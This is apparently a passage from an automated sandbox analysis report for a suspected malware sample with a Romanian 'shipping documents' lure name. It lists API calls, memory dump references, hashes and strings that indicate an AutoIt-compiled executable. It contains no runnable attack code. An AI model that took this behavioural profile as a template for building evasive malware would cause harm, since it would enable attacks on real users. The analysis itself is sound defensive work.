                                                • GetCursorPos.USER32(?), ref: 00692357
                                                • ScreenToClient.USER32(007567B0,?), ref: 00692374
                                                • GetAsyncKeyState.USER32(00000001), ref: 00692399
                                                • GetAsyncKeyState.USER32(00000002), ref: 006923A7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AsyncState$ClientCursorScreen
                                                • String ID:
                                                • API String ID: 4210589936-0
                                                • Opcode ID: d88ecf350b4d5ae48ea0ff64860c1513191b2351b3f90d5d09c99f8eeb6a1876
                                                • Instruction ID: 44db483f05e1b127746aa1f8cf2f9b63b42a01e7817efb1342755e9519bd85ca
                                                • Opcode Fuzzy Hash: d88ecf350b4d5ae48ea0ff64860c1513191b2351b3f90d5d09c99f8eeb6a1876
                                                • Instruction Fuzzy Hash: 21415135504116FBDF159F68C844FF9BB76FB05360F10835AF82992290C7389E94DB91
                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006E695D
                                                • TranslateAcceleratorW.USER32(?,?,?), ref: 006E69A9
                                                • TranslateMessage.USER32(?), ref: 006E69D2
                                                • DispatchMessageW.USER32(?), ref: 006E69DC
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006E69EB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                • String ID:
                                                • API String ID: 2108273632-0
                                                • Opcode ID: 3b16942d1a3f777960d7ea8b0e70c6f6e8aa28e8558fa2dbdeea42a969660667
                                                • Instruction ID: 85a635cb367092d0cf2dc36130ee3660ffd1ee86f96a67be6ddbe23b6616546d
                                                • Opcode Fuzzy Hash: 3b16942d1a3f777960d7ea8b0e70c6f6e8aa28e8558fa2dbdeea42a969660667
                                                • Instruction Fuzzy Hash: A131F8719023879ADB60CF76CC44FF67BAEAB25381F108179F421D32A2D7B89846D794
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 006E8F12
                                                • PostMessageW.USER32(?,00000201,00000001), ref: 006E8FBC
                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 006E8FC4
                                                • PostMessageW.USER32(?,00000202,00000000), ref: 006E8FD2
                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 006E8FDA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessagePostSleep$RectWindow
                                                • String ID:
                                                • API String ID: 3382505437-0
                                                • Opcode ID: 962663268c1e7db7808b4dc0a13f48552e4bdf7cf189b346e53c4e1205bba5c5
                                                • Instruction ID: 0c69876085edf0f5070556bc1796d82aea2f6bbb452582aa5798839dc0ec9434
                                                • Opcode Fuzzy Hash: 962663268c1e7db7808b4dc0a13f48552e4bdf7cf189b346e53c4e1205bba5c5
                                                • Instruction Fuzzy Hash: 9931DC71501259EFDB00CFA9D94CADE7BB6FB04325F108269F928AB2D0C7B49910DB90
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 006EB6C7
                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 006EB6E4
                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 006EB71C
                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 006EB742
                                                • _wcsstr.LIBCMT ref: 006EB74C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                • String ID:
                                                • API String ID: 3902887630-0
                                                • Opcode ID: 7f750ae30dab7f32b769d09473aaea4551433a05ba95d4e0d83ce161d8d834e0
                                                • Instruction ID: 8e7f1d6cc2f2c14c47870858ec435723f78984508c2f1b56708654a2fe1ee977
                                                • Opcode Fuzzy Hash: 7f750ae30dab7f32b769d09473aaea4551433a05ba95d4e0d83ce161d8d834e0
                                                • Instruction Fuzzy Hash: 3A210771205344BAEB255B3A9C49EBB7BAEDF45710F10802DFC05CA2A1EF61CC819764
                                                APIs
                                                  • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0071B44C
                                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0071B471
                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0071B489
                                                • GetSystemMetrics.USER32(00000004), ref: 0071B4B2
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00701184,00000000), ref: 0071B4D0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$Long$MetricsSystem
                                                • String ID:
                                                • API String ID: 2294984445-0
                                                • Opcode ID: abef9352e6ad258406aa93389daf13a6add0aa72971ff6dcf7ef9921dd94b9e4
                                                • Instruction ID: fa008bbd499316a073e10fd697b25588f58cbbfcac6566bc95f9ed33383fec9c
                                                • Opcode Fuzzy Hash: abef9352e6ad258406aa93389daf13a6add0aa72971ff6dcf7ef9921dd94b9e4
                                                • Instruction Fuzzy Hash: 4A218071610295AFCB108F3CDC04AEA3BA4EB05721B10C738FD26C31E1E7389890DB80
                                                APIs
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006E9802
                                                  • Part of subcall function 00697D2C: _memmove.LIBCMT ref: 00697D66
                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006E9834
                                                • __itow.LIBCMT ref: 006E984C
                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006E9874
                                                • __itow.LIBCMT ref: 006E9885
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$__itow$_memmove
                                                • String ID:
                                                • API String ID: 2983881199-0
                                                APIs
                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0069134D
                                                • SelectObject.GDI32(?,00000000), ref: 0069135C
                                                • BeginPath.GDI32(?), ref: 00691373
                                                • SelectObject.GDI32(?,00000000), ref: 0069139C
                                                Similarity
                                                • API ID: ObjectSelect$BeginCreatePath
                                                • String ID:
                                                • API String ID: 3225163088-0
                                                APIs
                                                Similarity
                                                • API ID: _memcmp
                                                • String ID:
                                                • API String ID: 2931989736-0
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 006F4D5C
                                                • __beginthreadex.LIBCMT ref: 006F4D7A
                                                • MessageBoxW.USER32(?,?,?,?), ref: 006F4D8F
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 006F4DA5
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006F4DAC
                                                Similarity
                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                • String ID:
                                                • API String ID: 3824534824-0
                                                APIs
                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006E8766
                                                • GetLastError.KERNEL32(?,006E822A,?,?,?), ref: 006E8770
                                                • GetProcessHeap.KERNEL32(00000008,?,?,006E822A,?,?,?), ref: 006E877F
                                                • HeapAlloc.KERNEL32(00000000,?,006E822A,?,?,?), ref: 006E8786
                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006E879D
                                                Similarity
                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 842720411-0
                                                APIs
                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006F5502
                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 006F5510
                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 006F5518
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 006F5522
                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006F555E
                                                Similarity
                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                • String ID:
                                                • API String ID: 2833360925-0
                                                APIs
                                                • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E758C,80070057,?,?,?,006E799D), ref: 006E766F
                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E758C,80070057,?,?), ref: 006E768A
                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E758C,80070057,?,?), ref: 006E7698
                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E758C,80070057,?), ref: 006E76A8
                                                • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E758C,80070057,?,?), ref: 006E76B4
                                                Similarity
                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                • String ID:
                                                • API String ID: 3897988419-0
                                                APIs
                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006E8608
                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006E8612
                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006E8621
                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006E8628
                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006E863E
                                                Similarity
                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 44706859-0
                                                APIs
                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006E8669
                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006E8673
                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006E8682
                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 006E8689
                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006E869F
                                                Similarity
                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 44706859-0
                                                APIs
                                                • GetDlgItem.USER32(?,000003E9), ref: 006EC6BA
                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 006EC6D1
                                                • MessageBeep.USER32(00000000), ref: 006EC6E9
                                                • KillTimer.USER32(?,0000040A), ref: 006EC705
                                                • EndDialog.USER32(?,00000001), ref: 006EC71F
                                                Similarity
                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                • String ID:
                                                • API String ID: 3741023627-0
                                                APIs
                                                • EndPath.GDI32(?), ref: 006913BF
                                                • StrokeAndFillPath.GDI32(?,?,006CBAD8,00000000,?), ref: 006913DB
                                                • SelectObject.GDI32(?,00000000), ref: 006913EE
                                                • DeleteObject.GDI32 ref: 00691401
                                                • StrokePath.GDI32(?), ref: 0069141C
                                                Similarity
                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                • String ID:
                                                • API String ID: 2625713937-0
                                                APIs
                                                  • Part of subcall function 006B0FF6: std::exception::exception.LIBCMT ref: 006B102C
                                                  • Part of subcall function 006B0FF6: __CxxThrowException@8.LIBCMT ref: 006B1041
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                  • Part of subcall function 00697BB1: _memmove.LIBCMT ref: 00697C0B
                                                • __swprintf.LIBCMT ref: 006A302D
                                                Strings
                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 006A2EC6
                                                Similarity
                                                • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                • API String ID: 1943609520-557222456
                                                APIs
                                                • OleSetContainedObject.OLE32(?,00000001), ref: 006EB981
                                                Strings
                                                Similarity
                                                • API ID: ContainedObject
                                                • String ID: AutoIt3GUI$Container$%r
                                                • API String ID: 3565006973-1282070598
                                                • Opcode ID: 7172350dbc2bfee3b58bb87e3226b0971f6823c7143a029e43b3d5b764a53a1e
                                                • Instruction ID: f43eeb77957064f35a17aacf865e32107262fe77e2500cd7cd80a91519044b40
                                                • Opcode Fuzzy Hash: 7172350dbc2bfee3b58bb87e3226b0971f6823c7143a029e43b3d5b764a53a1e
                                                • Instruction Fuzzy Hash: 4E914A706013019FDB64CF69C884AABBBEAFF49710F24956DE949CB7A1DB70E841CB50
                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 006B52DD
                                                  • Part of subcall function 006C0340: __87except.LIBCMT ref: 006C037B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ErrorHandling__87except__start
                                                • String ID: pow
                                                • API String ID: 2905807303-2276729525
                                                • Opcode ID: 68aa13a1957d75ef6a38b8e61df8b25f3387c3240aaf202bbd4f370a2da3ef97
                                                • Instruction ID: 509a759e69d6b0228ee80b7e85e8e20a5759bc4a509c85fb56bab92da07fbdab
                                                • Opcode Fuzzy Hash: 68aa13a1957d75ef6a38b8e61df8b25f3387c3240aaf202bbd4f370a2da3ef97
                                                • Instruction Fuzzy Hash: 8E5179A0A09602C6EB197724CA41BFA2BD6DB00350F20C95CE096823E5EB788DC5DB5A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #$+
                                                • API String ID: 0-2552117581
                                                • Opcode ID: 02b09016c750b34f7592ececa2264d6ed6de0adf1397e8c9f0f6f3cf5a80ee09
                                                • Instruction ID: f1a7451abe256e834e2b737c3ac7204426c6ee208c0a5bd0108876b40759f0f6
                                                • Opcode Fuzzy Hash: 02b09016c750b34f7592ececa2264d6ed6de0adf1397e8c9f0f6f3cf5a80ee09
                                                • Instruction Fuzzy Hash: 94513375106386DFEF259F29C8886FE7BAAEF19310F144055E8929B3A0C7349D82CB64
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memmove$_free
                                                • String ID: Oaj
                                                • API String ID: 2620147621-1426506063
                                                • Opcode ID: a2d9adafaf99bc2cb844cd967f2279cd6b74c6d64a24abd44cc60452b3878794
                                                • Instruction ID: e10434978a8dd49770c6382b4cc296f7c6c2a238a247c06214050063e277885a
                                                • Opcode Fuzzy Hash: a2d9adafaf99bc2cb844cd967f2279cd6b74c6d64a24abd44cc60452b3878794
                                                • Instruction Fuzzy Hash: FD514AB1A083519FDB24DF28C451B6ABBE6AF86304F04492DF98987351EB31EE41CF52
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memset$_memmove
                                                • String ID: ERCP
                                                • API String ID: 2532777613-1384759551
                                                • Opcode ID: af3a0d62436b034a1c56f0ba9770b9208ae1b1e70ffaafe09879a539b53d780c
                                                • Instruction ID: cad46537864313b9d0b7057fd7d48f5ec010587d9cc8ac090cfc93a35dc2f3d6
                                                • Opcode Fuzzy Hash: af3a0d62436b034a1c56f0ba9770b9208ae1b1e70ffaafe09879a539b53d780c
                                                • Instruction Fuzzy Hash: 2D51AFB1900309DBDB24DF65C8817EABBF6EF09714F24856EE54ACA240E7709A85CF40
                                                APIs
                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007176D0
                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007176E4
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00717708
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window
                                                • String ID: SysMonthCal32
                                                • API String ID: 2326795674-1439706946
                                                • Opcode ID: 62467167983b275f28cb7e8ca4415a3b5f3f35ed51e13e6a04cb5b0a357c4f8b
                                                • Instruction ID: 26087a065c31ad13c36323511ae0d004402d262ed31b302134f87691a4781e57
                                                • Opcode Fuzzy Hash: 62467167983b275f28cb7e8ca4415a3b5f3f35ed51e13e6a04cb5b0a357c4f8b
                                                • Instruction Fuzzy Hash: 97219F32600219ABDF15CE68CC46FEA3B79EF58714F110214FE156B1D0DAB9AC91CBA0
                                                APIs
                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00716FAA
                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00716FBA
                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00716FDF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$MoveWindow
                                                • String ID: Listbox
                                                • API String ID: 3315199576-2633736733
                                                • Opcode ID: ff3073289efa51db1f863aa6f129377ea171fc643fa69de1c191d9824fc4c36b
                                                • Instruction ID: dd48103239754ae48e55f5aca3731d88a1f979a8260f0decc3d480f1940268e9
                                                • Opcode Fuzzy Hash: ff3073289efa51db1f863aa6f129377ea171fc643fa69de1c191d9824fc4c36b
                                                • Instruction Fuzzy Hash: C3216232611118BFDF118F58DC85EEB37AEEF89754F118124F9149B1D0C675AC92CBA0
                                                APIs
                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007179E1
                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007179F6
                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00717A03
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: msctls_trackbar32
                                                • API String ID: 3850602802-1010561917
                                                • Opcode ID: a7cc017f684979a60b679a68fa26f526512348155f2aa320fbfc77a9a9364451
                                                • Instruction ID: ceafb640a87c064a69c78077b315df715cbfa01288f07ca13bf801a605794e3e
                                                • Opcode Fuzzy Hash: a7cc017f684979a60b679a68fa26f526512348155f2aa320fbfc77a9a9364451
                                                • Instruction Fuzzy Hash: 5611E372244208BAEF149F78CC05FEB37A9EF89B64F114519FA41A60D0D275E891CB60
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00694C2E), ref: 00694CA3
                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00694CB5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                • API String ID: 2574300362-192647395
                                                • Opcode ID: 377fb98622cf5724a56b02258d63338a8cbd8fe497a2d8944db8e174dd10d7a4
                                                • Instruction ID: f4815bf2157f65d08ab3a3577e6f780f9e9f6c925cb5d41e5b1edbcae27f0c86
                                                • Opcode Fuzzy Hash: 377fb98622cf5724a56b02258d63338a8cbd8fe497a2d8944db8e174dd10d7a4
                                                • Instruction Fuzzy Hash: 84D0C2B0500727DFCB204F38D908A8272EAAF00740B10C839D885C2690DA78C4C0C610
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00694D2E,?,00694F4F,?,007562F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00694D6F
                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00694D81
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
